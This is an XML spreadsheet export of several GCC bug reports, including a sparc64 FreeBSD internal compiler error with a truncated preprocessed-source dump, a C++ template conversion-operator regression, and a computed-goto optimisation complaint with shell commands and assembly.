    <t>sparc64 gcc -mhard-quad-float cannot compile libstdc++-v3</t>
  </si>
  <si>
    <t>With HARD_QUAD enabled in TARGET_DEFAULT for gcc/config/sparc/freebsd.h
'long double' is not well liked:
/ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/bits/locale_facets.tcc: In
   function `int std::__convert_from_v(char* int const char* _Tv int* 
   const&amp; int) [with _Tv = long double]':
/FBSD/egcs-repo/fbsd.gcc-3_1-branch/libstdc++-v3/src/locale-inst.cc:468:   instantiated from here
/ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/bits/locale_facets.tcc:1978: could
   not split insn
(insn:TI 78 70 47 (set (reg:TF 12 %o4)
        (reg/v:TF 18 %l2 [112])) 101 {*movtf_insn_hq_sp64} (insn_list:REG_DEP_OUTPUT 41 (insn_list 183 (insn_list 181 (nil))))
    (nil))
/ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/bits/locale_facets.tcc:1978: Internal
   compiler error in final_scan_insn at final.c:2628
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
*** Error code 1
Stop in /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/src.
*** Error code 1
Release:
3.1 20020415 (prerelease)
Environment:
System: FreeBSD blade100.nuxi.com 5.0-CURRENT FreeBSD 5.0-CURRENT #34: Mon Apr 15 02:47:01 PDT 2002 obrien@dragon.nuxi.com:/FBSD/p4co/sp64/sys/sparc64/compile/GENERIC.cross sparc64
host: sparc64-unknown-freebsd5.0
build: sparc64-unknown-freebsd5.0
target: sparc64-unknown-freebsd5.0
configured with: /FBSD/egcs-repo/fbsd.gcc-3_1-branch/configure --prefix=/arch/sparc64/hosted.20020415 --enable-languages=cc++ --disable-shared --disable-multilibs --disable-nls --disable-threads --without-newlib --without-libgloss
How-To-Repeat:
---[ locale-inst.ii ]---
# 1 /FBSD/egcs-repo/fbsd.gcc-3_1-branch/libstdc++-v3/src/locale-inst.cc
# 1 
# 1 
# 1 /FBSD/egcs-repo/fbsd.gcc-3_1-branch/libstdc++-v3/src/locale-inst.cc
# 34 /FBSD/egcs-repo/fbsd.gcc-3_1-branch/libstdc++-v3/src/locale-inst.cc
# 1 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cstdlib 1
# 48 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cstdlib 3
# 1 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/sparc64-unknown-freebsd5.0/bits/c++config.h 1 3
# 34 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/sparc64-unknown-freebsd5.0/bits/c++config.h 3
# 1 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/sparc64-unknown-freebsd5.0/bits/os_defines.h 1 3
# 35 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/sparc64-unknown-freebsd5.0/bits/c++config.h 2 3
# 50 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cstdlib 2 3
# 1 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cstddef 1 3
# 47 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cstddef 3
# 1 /ad0a/o/gcc/include/stddef.h 1 3
# 57 /ad0a/o/gcc/include/stddef.h 3
# 1 /usr/include/machine/ansi.h 1 3
# 82 /usr/include/machine/ansi.h 3
typedef __builtin_va_list __gnuc_va_list
# 125 /usr/include/machine/ansi.h 3
typedef __signed char __int8_t
typedef unsigned char __uint8_t
typedef short __int16_t
typedef unsigned short __uint16_t
typedef int __int32_t
typedef unsigned int __uint32_t
typedef long __int64_t
typedef unsigned long __uint64_t
typedef long __intptr_t
typedef unsigned long __uintptr_t
typedef __signed char __int_least8_t
typedef unsigned char __uint_least8_t
typedef short __int_least16_t
typedef unsigned short __uint_least16_t
typedef int __int_least32_t
typedef unsigned int __uint_least32_t
typedef long __int_least64_t
typedef unsigned long __uint_least64_t
typedef int __int_fast8_t
typedef unsigned int __uint_fast8_t
typedef int __int_fast16_t
typedef unsigned int __uint_fast16_t
typedef int __int_fast32_t
typedef unsigned int __uint_fast32_t
typedef long __int_fast64_t
typedef unsigned long __uint_fast64_t
typedef long __intmax_t
typedef unsigned long __uintmax_t
# 175 /usr/include/machine/ansi.h 3
typedef union {
        char __mbstate8[128]
        __int64_t _mbstateL
} __mbstate_t
# 58 /ad0a/o/gcc/include/stddef.h 2 3
# 147 /ad0a/o/gcc/include/stddef.h 3
typedef long int ptrdiff_t
# 201 /ad0a/o/gcc/include/stddef.h 3
typedef long unsigned int size_t
# 277 /ad0a/o/gcc/include/stddef.h 3
typedef int rune_t
# 49 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cstddef 2 3
namespace std
{
  using ::ptrdiff_t
  using ::size_t
}
# 51 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cstdlib 2 3
# 1 /ad0a/o/gcc/include/stdlib.h 1 3
# 49 /ad0a/o/gcc/include/stdlib.h 3
# 1 /usr/include/sys/cdefs.h 1 3
# 50 /ad0a/o/gcc/include/stdlib.h 2 3
# 80 /ad0a/o/gcc/include/stdlib.h 3
typedef struct {
        int quot
        int rem
} div_t
typedef struct {
        long quot
        long rem
} ldiv_t
typedef struct {
        long long quot
        long long rem
} lldiv_t
# 108 /ad0a/o/gcc/include/stdlib.h 3
extern int __mb_cur_max
extern C {
void abort(void) __attribute__((__noreturn__))
int abs(int) __attribute__((__const__))
int atexit(void (*)(void))
double atof(const char *)
int atoi(const char *)
long atol(const char *)
void *bsearch(const void * const void * size_t
            size_t int (*)(const void * const void *))
void *calloc(size_t size_t)
div_t div(int int) __attribute__((__const__))
void exit(int) __attribute__((__noreturn__))
void free(void *)
char *getenv(const char *)
long labs(long) __attribute__((__const__))
ldiv_t ldiv(long long) __attribute__((__const__))
void *malloc(size_t)
void qsort(void * size_t size_t
            int (*)(const void * const void *))
int rand(void)
void *realloc(void * size_t)
void srand(unsigned)
double strtod(const char * char **)
long strtol(const char * char ** int)
unsigned long
         strtoul(const char * char ** int)
int system(const char *)
int mblen(const char * size_t)
size_t mbstowcs(wchar_t * const char * size_t)
int wctomb(char * wchar_t)
int mbtowc(wchar_t * const char * size_t)
size_t wcstombs(char * const wchar_t * size_t)
extern char *_malloc_options
extern void (*_malloc_message)(char *p1 char *p2 char *p3 char *p4)
int putenv(const char *)
int setenv(const char * const char * int)
double drand48(void)
double erand48(unsigned short[3])
long jrand48(unsigned short[3])
void lcong48(unsigned short[7])
long lrand48(void)
long mrand48(void)
long nrand48(unsigned short[3])
unsigned short
        *seed48(unsigned short[3])
void srand48(long)
void *alloca(size_t)
__uint32_t
         arc4random(void)
void arc4random_addrandom(unsigned char *dat int datlen)
void arc4random_stir(void)
long long
         atoll(const char *)
char *getbsize(int * long *)
char *cgetcap(char * const char * int)
int cgetclose(void)
int cgetent(char ** char ** const char *)
int cgetfirst(char ** char **)
int cgetmatch(const char * const char *)
int cgetnext(char ** char **)
int cgetnum(char * const char * long *)
int cgetset(const char *)
int cgetstr(char * const char * char **)
int cgetustr(char * const char * char **)
int daemon(int int)
char *devname(int int)
int getloadavg(double [] int)
const char *
         getprogname(void)
int heapsort(void * size_t size_t int (*)(const void * const void *))
char *initstate(unsigned long char * long)
long long
         llabs(long long) __attribute__((__const__))
lldiv_t lldiv(long long long long) __attribute__((__const__))
int mergesort(void * size_t size_t int (*)(const void * const void *))
int radixsort(const unsigned char ** int const unsigned char *
            unsigned)
int sradixsort(const unsigned char ** int const unsigned char *
            unsigned)
int rand_r(unsigned *)
long random(void)
void *reallocf(void * size_t)
char *realpath(const char * char resolved_path[])
void setprogname(const char *)
char *setstate(char *)
void sranddev(void)
void srandom(unsigned long)
void srandomdev(void)
long long
         strtoll(const char * char ** int)
__int64_t strtoq(const char * char ** int)
unsigned long long
         strtoull(const char * char ** int)
__uint64_t
         strtouq(const char * char ** int)
void unsetenv(const char *)
}
# 53 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cstdlib 2 3
# 84 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cstdlib 3
namespace std
{
  using ::div_t
  using ::ldiv_t
  using ::abort
  using ::abs
  using ::atexit
  using ::atof
  using ::atoi
  using ::atol
  using ::bsearch
  using ::calloc
  using ::div
  using ::exit
  using ::free
  using ::getenv
  using ::labs
  using ::ldiv
  using ::malloc
  using ::mblen
  using ::mbstowcs
  using ::mbtowc
  using ::qsort
  using ::rand
  using ::realloc
  using ::srand
  using ::strtod
  using ::strtol
  using ::strtoul
  using ::system
  using ::wcstombs
  using ::wctomb
  inline long
  abs(long __i) { return labs(__i) }
  inline ldiv_t
  div(long __i long __j) { return ldiv(__i __j) }
}
# 35 /FBSD/egcs-repo/fbsd.gcc-3_1-branch/libstdc++-v3/src/locale-inst.cc 2
# 1 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/clocale 1
# 48 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/clocale 3
# 1 /usr/include/locale.h 1 3
# 40 /usr/include/locale.h 3
struct lconv {
        char *decimal_point
        char *thousands_sep
        char *grouping
        char *int_curr_symbol
        char *currency_symbol
        char *mon_decimal_point
        char *mon_thousands_sep
        char *mon_grouping
        char *positive_sign
        char *negative_sign
        char int_frac_digits
        char frac_digits
        char p_cs_precedes
        char p_sep_by_space
        char n_cs_precedes
        char n_sep_by_space
        char p_sign_posn
        char n_sign_posn
}
# 77 /usr/include/locale.h 3
extern C {
struct lconv *localeconv(void)
char *setlocale(int const char *)
}
# 50 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/clocale 2 3
namespace std
{
  using ::lconv
  using ::setlocale
  using ::localeconv
}
# 36 /FBSD/egcs-repo/fbsd.gcc-3_1-branch/libstdc++-v3/src/locale-inst.cc 2
# 1 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cstring 1
# 48 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cstring 3
# 1 /usr/include/string.h 1 3
# 48 /usr/include/string.h 3
# 1 /usr/include/strings.h 1 3
# 40 /usr/include/strings.h 3
extern C {
int bcmp(const void * const void * size_t)
void bcopy(const void * void * size_t)
void bzero(void * size_t)
int ffs(int)
char *index(const char * int)
char *rindex(const char * int)
int strcasecmp(const char * const char *)
int strncasecmp(const char * const char * size_t)
}
# 49 /usr/include/string.h 2 3
# 60 /usr/include/string.h 3
extern C {
void *memchr(const void * int size_t)
int memcmp(const void * const void * size_t)
void *memcpy(void *  const void *  size_t)
void *memmove(void * const void * size_t)
void *memset(void * int size_t)
char *strcat(char *  const char * )
char *strchr(const char * int)
int strcmp(const char * const char *)
int strcoll(const char * const char *)
char *strcpy(char *  const char * )
size_t strcspn(const char * const char *)
char *strerror(int)
size_t strlen(const char *)
char *strncat(char *  const char *  size_t)
int strncmp(const char * const char * size_t)
char *strncpy(char *  const char *  size_t)
char *strpbrk(const char * const char *)
char *strrchr(const char * int)
size_t strspn(const char * const char *)
char *strstr(const char * const char *)
char *strtok(char *  const char * )
size_t strxfrm(char *  const char *  size_t)
void *memccpy(void *  const void *  int size_t)
char *strdup(const char *)
int strerror_r(int char * size_t)
char *strtok_r(char * const char * char **)
char *strcasestr(const char * const char *)
size_t strlcat(char * const char * size_t)
size_t strlcpy(char * const char * size_t)
void strmode(int char *)
char *strnstr(const char * const char * size_t)
char *strsep(char ** const char *)
char *strsignal(int)
void swab(const void * void * size_t)
}
# 52 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cstring 2 3
# 77 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cstring 3
namespace std
{
  using ::memcpy
  using ::memmove
  using ::strcpy
  using ::strncpy
  using ::strcat
  using ::strncat
  using ::memcmp
  using ::strcmp
  using ::strcoll
  using ::strncmp
  using ::strxfrm
  using ::strcspn
  using ::strspn
  using ::strtok
  using ::memset
  using ::strerror
  using ::strlen
  using ::memchr
  inline void*
  memchr(void* __p int __c size_t __n)
  { return memchr(const_cast(__p) __c __n) }
  using ::strchr
  inline char*
  strchr(char* __s1 int __n)
  { return __builtin_strchr(const_cast(__s1) __n) }
  using ::strpbrk
  inline char*
  strpbrk(char* __s1 const char* __s2)
  { return __builtin_strpbrk(const_cast(__s1) __s2) }
  using ::strrchr
  inline char*
  strrchr(char* __s1 int __n)
  { return __builtin_strrchr(const_cast(__s1) __n) }
  using ::strstr
  inline char*
  strstr(char* __s1 const char* __s2)
  { return __builtin_strstr(const_cast(__s1) __s2) }
}
# 37 /FBSD/egcs-repo/fbsd.gcc-3_1-branch/libstdc++-v3/src/locale-inst.cc 2
# 1 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cassert 1
# 47 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cassert 3
# 1 /usr/include/assert.h 1 3
# 62 /usr/include/assert.h 3
extern C {
void __assert(const char * const char * int const char *)
}
# 49 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/cassert 2 3
# 38 /FBSD/egcs-repo/fbsd.gcc-3_1-branch/libstdc++-v3/src/locale-inst.cc 2
# 1 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/limits 1
# 47 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/limits 3
# 1 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/sparc64-unknown-freebsd5.0/bits/cpu_limits.h 1 3
# 49 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/limits 2 3
# 887 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/limits 3
namespace std
{
  enum float_round_style
  {
    round_indeterminate = -1
    round_toward_zero = 0
    round_to_nearest = 1
    round_toward_infinity = 2
    round_toward_neg_infinity = 3
  }
  enum float_denorm_style
  {
    denorm_indeterminate = -1
    denorm_absent = 0
    denorm_present = 1
  }
  struct __numeric_limits_base
  {
    static const bool is_specialized = false
    static const int digits = 0
    static const int digits10 = 0
    static const bool is_signed = false
    static const bool is_integer = false
    static const bool is_exact = false
    static const int radix = 0
    static const int min_exponent = 0
    static const int min_exponent10 = 0
    static const int max_exponent = 0
    static const int max_exponent10 = 0
    static const bool has_infinity = false
    static const bool has_quiet_NaN = false
    static const bool has_signaling_NaN = false
    static const float_denorm_style has_denorm = denorm_absent
    static const bool has_denorm_loss = false
    static const bool is_iec559 = false
    static const bool is_bounded = false
    static const bool is_modulo = false
    static const bool traps = false
    static const bool tinyness_before = false
    static const float_round_style round_style = round_toward_zero
  }
  template
    struct numeric_limits : public __numeric_limits_base
    {
      static _Tp min() throw() { return static_cast(0) }
      static _Tp max() throw() { return static_cast(0) }
      static _Tp epsilon() throw() { return static_cast(0) }
      static _Tp round_error() throw() { return static_cast(0) }
      static _Tp infinity() throw() { return static_cast(0) }
      static _Tp quiet_NaN() throw() { return static_cast(0) }
      static _Tp signaling_NaN() throw() { return static_cast(0) }
      static _Tp denorm_min() throw() { return static_cast(0) }
    }
  template
    struct numeric_limits
    {
      static const bool is_specialized = true
      static bool min() throw()
      { return false }
      static bool max() throw()
      { return true }
      static const int digits = 1
      static const int digits10 = 0
      static const bool is_signed = false
      static const bool is_integer = true
      static const bool is_exact = true
      static const int radix = 2
      static bool epsilon() throw()
      { return false }
      static bool round_error() throw()
      { return false }
      static const int min_exponent = 0
      static const int min_exponent10 = 0
      static const int max_exponent = 0
      static const int max_exponent10 = 0
      static const bool has_infinity = false
      static const bool has_quiet_NaN = false
      static const bool has_signaling_NaN = false
      static const float_denorm_style has_denorm = denorm_absent
      static const bool has_denorm_loss = false
      static bool infinity() throw()
      { return false }
      static bool quiet_NaN() throw()
      { return false }
      static bool signaling_NaN() throw()
      { return false }
      static bool denorm_min() throw()
      { return false }
      static const bool is_iec559 = false
      static const bool is_bounded = true
      static const bool is_modulo = false
      static const bool traps = true
               || true
      static const bool tinyness_before = false
      static const float_round_style round_style = round_toward_zero
    }
  template
    struct numeric_limits
    {
      static const bool is_specialized = true
      static char min() throw()
      { return (char)(-127 - 1) }
      static char max() throw()
      { return (char)127 }
      static const int digits = 7
      static const int digits10 = 7
      static const bool is_signed = true
      static const bool is_integer = true
      static const bool is_exact = true
      static const int radix = 2
      static char epsilon() throw()
      { return char() }
      static char round_error() throw()
      { return char() }
      static const int min_exponent = 0
      static const int min_exponent10 = 0
      static const int max_exponent = 0
      static const int max_exponent10 = 0
      static const bool has_infinity = false
      static const bool has_quiet_NaN = false
      static const bool has_signaling_NaN = false
      static const float_denorm_style has_denorm = denorm_absent
      static const bool has_denorm_loss = false
      static char infinity() throw()
      { return char() }
      static char quiet_NaN() throw()
      { return char() }
      static char signaling_NaN() throw()
      { return char() }
      static char denorm_min() throw()
      { return static_cast(0) }
      static const bool is_iec559 = false
      static const bool is_bounded = true
      static const bool is_modulo = true
      static const bool traps = true
      static const bool tinyness_before = false
      static const float_round_style round_style = round_toward_zero
    }
# 1071 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/limits 3
  template
    struct numeric_limits
    {
      static const bool is_specialized = true
      static signed char min() throw()
      { return (-127 - 1) }
      static signed char max() throw()
      { return 127 }
      static const int digits = 7
      static const int digits10 = 2
      static const bool is_signed = true
      static const bool is_integer = true
      static const bool is_exact = true
      static const int radix = 2
      static signed char epsilon() throw()
      { return 0 }
      static signed char round_error() throw()
      { return 0 }
      static const int min_exponent = 0
      static const int min_exponent10 = 0
      static const int max_exponent = 0
      static const int max_exponent10 = 0
      static const bool has_infinity = false
      static const bool has_quiet_NaN = false
      static const bool has_signaling_NaN = false
      static const float_denorm_style has_denorm = denorm_absent
      static const bool has_denorm_loss = false
      static signed char infinity() throw()
      { return static_cast(0) }
      static signed char quiet_NaN() throw()
      { return static_cast(0) }
      static signed char signaling_NaN() throw()
      { return static_cast(0) }
      static signed char denorm_min() throw()
      { return static_cast(0) }
      static const bool is_iec559 = false
      static const bool is_bounded = true
      static const bool is_modulo = true
      static const bool traps = true
      static const bool tinyness_before = false
      static const float_round_style round_style = round_toward_zero
    }
# 1128 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/limits 3
  template
    struct numeric_limits
    {
      static const bool is_specialized = true
      static unsigned char min() throw()
      { return 0 }
      static unsigned char max() throw()
      { return (127 * 2 + 1) }
      static const int digits = 8
      static const int digits10 = 2
      static const bool is_signed = false
      static const bool is_integer = true
      static const bool is_exact = true
      static const int radix = 2
      static unsigned char epsilon() throw()
      { return 0 }
      static unsigned char round_error() throw()
      { return 0 }
      static const int min_exponent = 0
      static const int min_exponent10 = 0
      static const int max_exponent = 0
      static const int max_exponent10 = 0
      static const bool has_infinity = false
      static const bool has_quiet_NaN = false
      static const bool has_signaling_NaN = false
      static const float_denorm_style has_denorm = denorm_absent
      static const bool has_denorm_loss = false
      static unsigned char infinity() throw()
      { return static_cast(0) }
      static unsigned char quiet_NaN() throw()
      { return static_cast(0) }
      static unsigned char signaling_NaN() throw()
      { return static_cast(0) }
      static unsigned char denorm_min() throw()
      { return static_cast(0) }
      static const bool is_iec559 = false
      static const bool is_bounded = true
      static const bool is_modulo = true
      static const bool traps = true
      static const bool tinyness_before = false
      static const float_round_style round_style = round_toward_zero
    }
  template
    struct numeric_limits
    {
      static const bool is_specialized = true
      static wchar_t min() throw()
      { return (wchar_t)(-2147483647L - 1) }
      static wchar_t max() throw()
      { return (wchar_t)2147483647L }
      static const int digits = 31
      static const int digits10 = 9
      static const bool is_signed = true
      static const bool is_integer = true
      static const bool is_exact = true
      static const int radix = 2
      static wchar_t epsilon() throw()
      { return 0 }
      static wchar_t round_error() throw()
      { return 0 }
      static const int min_exponent = 0
      static const int min_exponent10 = 0
      static const int max_exponent = 0
      static const int max_exponent10 = 0
      static const bool has_infinity = false
      static const bool has_quiet_NaN = false
      static const bool has_signaling_NaN = false
      static const float_denorm_style has_denorm = denorm_absent
      static const bool has_denorm_loss = false
      static wchar_t infinity() throw()
      { return wchar_t() }
      static wchar_t quiet_NaN() throw()
      { return wchar_t() }
      static wchar_t signaling_NaN() throw()
      { return wchar_t() }
      static wchar_t denorm_min() throw()
      { return wchar_t() }
      static const bool is_iec559 = false
      static const bool is_bounded = true
      static const bool is_modulo = true
      static const bool traps = true
      static const bool tinyness_before = false
      static const float_round_style round_style = round_toward_zero
    }
# 1241 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/limits 3
  template
    struct numeric_limits
    {
      static const bool is_specialized = true
      static short min() throw()
      { return (-32767 - 1) }
      static short max() throw()
      { return 32767 }
      static const int digits = 15
      static const int digits10 = 4
      static const bool is_signed = true
      static const bool is_integer = true
      static const bool is_exact = true
      static const int radix = 2
      static short epsilon() throw()
      { return 0 }
      static short round_error() throw()
      { return 0 }
      static const int min_exponent = 0
      static const int min_exponent10 = 0
      static const int max_exponent = 0
      static const int max_exponent10 = 0
      static const bool has_infinity = false
      static const bool has_quiet_NaN = false
      static const bool has_signaling_NaN = false
      static const float_denorm_style has_denorm = denorm_absent
      static const bool has_denorm_loss = false
      static short infinity() throw()
      { return short() }
      static short quiet_NaN() throw()
      { return short() }
      static short signaling_NaN() throw()
      { return short() }
      static short denorm_min() throw()
      { return short() }
      static const bool is_iec559 = true
      static const bool is_bounded = true
      static const bool is_modulo = true
      static const bool traps = true
      static const bool tinyness_before = false
      static const float_round_style round_style = round_toward_zero
    }
# 1298 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/limits 3
  template
    struct numeric_limits
    {
      static const bool is_specialized = true
      static unsigned short min() throw()
      { return 0 }
      static unsigned short max() throw()
      { return (32767 * 2 + 1) }
      static const int digits = 16
      static const int digits10 = 4
      static const bool is_signed = false
      static const bool is_integer = true
      static const bool is_exact = true
      static const int radix = 2
      static unsigned short epsilon() throw()
      { return 0 }
      static unsigned short round_error() throw()
      { return 0 }
      static const int min_exponent = 0
      static const int min_exponent10 = 0
      static const int max_exponent = 0
      static const int max_exponent10 = 0
      static const bool has_infinity = false
      static const bool has_quiet_NaN = false
      static const bool has_signaling_NaN = false
      static const float_denorm_style has_denorm = denorm_absent
      static const bool has_denorm_loss = false
      static unsigned short infinity() throw()
      { return static_cast(0) }
      static unsigned short quiet_NaN() throw()
      { return static_cast(0) }
      static unsigned short signaling_NaN() throw()
      { return static_cast(0) }
      static unsigned short denorm_min() throw()
      { return static_cast(0) }
      static const bool is_iec559 = true
      static const bool is_bounded = true
      static const bool is_modulo = true
      static const bool traps = true
      static const bool tinyness_before = false
      static const float_round_style round_style = round_toward_zero
    }
  template
    struct numeric_limits
    {
      static const bool is_specialized = true
      static int min() throw()
      { return (int)(-2147483647L - 1) }
      static int max() throw()
      { return (int)2147483647L }
      static const int digits = 31
      static const int digits10 = 9
      static const bool is_signed = true
      static const bool is_integer = true
      static const bool is_exact = true
      static const int radix = 2
      static int epsilon() throw()
      { return 0 }
      static int round_error() throw()
      { return 0 }
      static const int min_exponent = 0
      static const int min_exponent10 = 0
      static const int max_exponent = 0
      static const int max_exponent10 = 0
      static const bool has_infinity = false
      static const bool has_quiet_NaN = false
      static const bool has_signaling_NaN = false
      static const float_denorm_style has_denorm = denorm_absent
      static const bool has_denorm_loss = false
      static int infinity() throw()
      { return static_cast(0) }
      static int quiet_NaN() throw()
      { return static_cast(0) }
      static int signaling_NaN() throw()
      { return static_cast(0) }
      static int denorm_min() throw()
      { return static_cast(0) }
      static const bool is_iec559 = true
      static const bool is_bounded = true
      static const bool is_modulo = true
      static const bool traps = true
      static const bool tinyness_before = false
      static const float_round_style round_style = round_toward_zero
    }
# 1410 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/limits 3
  template
    struct numeric_limits
    {
      static const bool is_specialized = true
      static unsigned int min() throw()
      { return 0 }
          static unsigned int max() throw()
      { return (unsigned)(2147483647L * 2U + 1) }
      static const int digits = 32
      static const int digits10 = 9
      static const bool is_signed = false
      static const bool is_integer = true
      static const bool is_exact = true
      static const int radix = 2
      static unsigned int epsilon() throw()
      { return 0 }
      static unsigned int round_error() throw()
      { return 0 }
      static const int min_exponent = 0
      static const int min_exponent10 = 0
      static const int max_exponent = 0
      static const int max_exponent10 = 0
      static const bool has_infinity = false
      static const bool has_quiet_NaN = false
      static const bool has_signaling_NaN = false
      static const float_denorm_style has_denorm = denorm_absent
      static const bool has_denorm_loss = false
      static unsigned int infinity() throw()
      { return static_cast(0) }
      static unsigned int quiet_NaN() throw()
      { return static_cast(0) }
      static unsigned int signaling_NaN() throw()
      { return static_cast(0) }
      static unsigned int denorm_min() throw()
      { return static_cast(0) }
      static const bool is_iec559 = true
      static const bool is_bounded = true
      static const bool is_modulo = true
      static const bool traps = true
      static const bool tinyness_before = false
      static const float_round_style round_style = round_toward_zero
    }
  template
    struct numeric_limits
    {
      static const bool is_specialized = true
      static long min() throw()
      { return (-2147483647L - 1) }
      static long max() throw()
      { return 2147483647L }
      static const int digits = 31
      static const int digits10 = 9
      static const bool is_signed = true
      static const bool is_integer = true
      static const bool is_exact = true
      static const int radix = 2
      static long epsilon() throw()
      { return 0 }
      static long round_error() throw()
      { return 0 }
      static const int min_exponent = 0
      static const int min_exponent10 = 0
      static const int max_exponent = 0
      static const int max_exponent10 = 0
      static const bool has_infinity = false
      static const bool has_quiet_NaN = false
      static const bool has_signaling_NaN = false
      static const float_denorm_style has_denorm = denorm_absent
      static const bool has_denorm_loss = false
      static long infinity() throw()
      { return static_cast(0) }
      static long quiet_NaN() throw()
      { return static_cast(0) }
      static long signaling_NaN() throw()
      { return static_cast(0) }
      static long denorm_min() throw()
      { return static_cast(0) }
      static const bool is_iec559 = true
      static const bool is_bounded = true
      static const bool is_modulo = true
      static const bool traps = true
      static const bool tinyness_before = false
      static const float_round_style round_style = round_toward_zero
    }
# 1522 /ad0a/o/sparc64-unknown-freebsd5.0/libstdc++-v3/include/limits 3
  template
    struct numeric_limits
    {
      static const bool is_specialized = true
      static unsigned long min() throw()
      { return 0 }
      static unsigned long max() throw()
      { return (2147483647L * 2U + 1) }
      static const int digits = 32
      static const int digits10 = 9
      static const bool is_signed = false
      static const bool is_integer = true
      static const bool is_exact = true
      static const int radix = 2
      static unsigned long epsilon() throw()
      { return 0 }
      static unsigned long round_error() throw()
      { return 0 }
      static const int min_exponent = 0
      static const int min_exponent10 = 0
      static const int max_exponent = 0
      static const int max_exponent10 = 0
      static const bool has_infinity = false
      static const bool has_quiet_NaN = false
      static const bool has_signaling_NaN = false
      static const float_denorm_style has_denorm = denorm_absent
      static const bool has_denorm_loss = false
      static unsigned long infinity() thr</t>
  </si>
  <si>
    <t>obrien</t>
  </si>
  <si>
    <t>GCC-28557</t>
  </si>
  <si>
    <t>[4.0 regression] Trouble with templated type conversion operator</t>
  </si>
  <si>
    <t>The following valid code snippet is rejected since GCC 4.0.3.
On mainline it even triggers an ICE:
=========================================================
struct A
{
    template operator T() { return T() }
}
template void foo()
{
    A().operator int()
}
void bar()
{
    foo()
}
=========================================================
bug.cc: In function 'void foo() [with int  = 0]':
bug.cc:13:   instantiated from here
bug.cc:8: error: invalid use of template type parameter
bug.cc: In member function 'A::operator T() [with T = T]':
bug.cc:8:   instantiated from 'void foo() [with int  = 0]'
bug.cc:13:   instantiated from here
bug.cc:3: internal compiler error: in dependent_type_p at cp/pt.c:12523
Please submit a full bug report [etc.]
The code compiles fine if I turn foo into a regular function.</t>
  </si>
  <si>
    <t>GCC-39284</t>
  </si>
  <si>
    <t>Computed gotos combined too aggressively</t>
  </si>
  <si>
    <t>The following uses a file ceval.i that I'll upload shortly and a nightly build of gcc-4.4.0-20090223. The file is a version of Python's core interpretation loop modified to use computed gotos in order to help the processor's branch predictor do a better job than with a switch statement. However gcc combines the computed gotos into only a few instructions producing a result nearly as bad as the switch.
The computed gotos are all of the form goto *next_label. About half of the instances counted are reachable as measured by the asm volatile farther down.
$ grep -c -F 'goto *next_label' ceval.i
256
I compile with -fno-gcse because http://gcc.gnu.org/onlinedocs/gcc-4.3.3/gcc/Optimize-Options.html#index-fgcse-646 says it helps and with --param max-goto-duplication-insns=100000 because Diego Novillo suggested tweaking that parameter.
$ gcc-4.4 -m32  -pthread  -fno-strict-aliasing -g -fwrapv -O3 -Wall -Wstrict-prototypes -fno-gcse --param max-goto-duplication-insns=100000  -S -dA ceval.i -o ceval.s
$ egrep -c 'jmp[[:space:]]*\*' ceval.s
4
I tried to make the common instruction sequence leading up to the indirection jump shorter by putting an asm volatile before it but that didn't work. You can see the result by running:
$ sed 's!goto \*next_label!asm volatile (/* Computed goto */:::memory)goto *next_label!'  ceval-asm.i
$ gcc-4.4 -m32  -pthread  -fno-strict-aliasing -g -fwrapv -O3 -fno-gcse --param max-goto-duplication-insns=100000  -S -dA ceval-asm.i -o ceval-asm.s
$ egrep -c 'Computed goto' ceval-asm.s
130
$ egrep -c 'jmp[[:space:]]*\*' ceval-asm.s
4
One of the relevant bits of assembly (search for Computed goto in ceval-asm.s) is:
.L1125:
	# basic block 66
.LBE835:
	# ../src/Python/ceval.c:1000
	.loc 1 1000 0
	jmp	*-72(%ebp)
.LVL558:
	.p2align 47
	.p2align 3
.L1433:
	# basic block 67
...
	# basic block 114
#APP
# 11 ../src/Include/ceval-vm.i 1
	/* Computed goto */
# 0  2
#NO_APP
	movl	%esi %ebx
.LVL599:
	.p2align 47
	.p2align 3
.L484:
	# basic block 115
	# ../src/Python/ceval.c:1000
	.loc 1 1000 0
	movl	$1 %eax
.LVL600:
	movl	%ebx %esi
.LVL601:
	jmp	.L1125
The documentation for max-goto-duplication-insns says:
